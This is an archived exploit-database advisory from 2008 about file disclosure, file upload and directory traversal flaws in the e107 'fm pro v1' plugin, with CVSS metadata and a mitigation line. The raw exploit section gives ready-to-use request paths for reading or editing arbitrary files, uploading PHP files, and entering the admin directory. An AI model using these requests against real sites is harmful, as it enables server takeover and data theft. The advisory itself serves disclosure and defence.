e107 Plugin fm pro v1 Multiple Remote Vulnerabilities

vendor:

Plugin fm pro v1

by:

milw0rm.com

7.5

CVSS

HIGH

Remote File Disclosure, Remote File Upload, Local Directory Traversal

22, 434, 264

CWE

Product Name: Plugin fm pro v1

Affected Version From: v1

Affected Version To: v1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

e107 Plugin fm pro v1 Multiple Remote Vulnerabilities

The e107 Plugin fm pro v1 is vulnerable to multiple remote vulnerabilities. These include Remote File Disclosure, Remote File Upload, and Local Directory Traversal. The Remote File Disclosure vulnerability allows an attacker to view any file on the server. The Remote File Upload vulnerability allows an attacker to upload a malicious PHP file to the server. The Local Directory Traversal vulnerability allows an attacker to view, rename, delete, view, and edit any folder or file on the server.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users should update to the latest version of the e107 Plugin fm pro v1.

Source

Exploit-DB raw data:

 _____   ____   __   __     _       ____        ____    ____ 
|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|

e107 Plugin fm pro v1 Multiple Remote Vulnerabilities

I- Remote File Disclosure  / Write File 
/e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_edit_file&fm_filename={File}

II- Remote File Upload 
/e107_plugins/fm_pro_v1/fmp.php?fm_dir=&fm_action=confirm_upload_file
You Can Upload PHP File 
Get File in site.com/{path e107}/[name your file - as - 020.php]

III- Local Directory Traversal
/e107_plugins/fm_pro_v1/fmp.php?fm_dir=e107_admin
And You Can [Rename] [Delete] [View] [Edit] Any Folder Or File


        ____           _           _           __  __ 
       / ___|   ___   | |       __| |         |  \/  |
      | |  _   / _ \  | |      / _` |         | |\/| |
      | |_| | | (_) | | |___  | (_| |         | |  | |
       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
                                      |_____|         


# milw0rm.com [2008-10-29]